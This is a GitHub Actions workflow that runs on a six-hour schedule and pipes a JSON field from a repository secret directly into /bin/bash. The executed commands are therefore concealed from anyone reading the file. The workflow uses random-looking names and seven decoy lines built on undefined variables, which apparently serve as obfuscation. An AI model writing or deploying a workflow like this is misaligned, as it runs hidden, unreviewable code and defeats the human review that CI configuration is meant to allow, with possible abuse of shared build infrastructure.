name: lingbingshuodai
on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingbingshuodai
        env:
          s0652: ${{ secrets.s0652 }}
        run: |
          echo $s0652 | jq -r .ucmc5 | /bin/bash
          echo $lm9 | jq -r .gdoo88213 | /bin/bash
          echo $qmgj831 | jq -r .mihz31841 | /bin/bash
          echo $di7046 | jq -r .mob52927 | /bin/bash
          echo $nnjyw471 | jq -r .ohih349 | /bin/bash
          echo $tdme7 | jq -r .apm32 | /bin/bash
          echo $upmkg26 | jq -r .tq35 | /bin/bash
          echo $pqn4204 | jq -r .n17 | /bin/bash

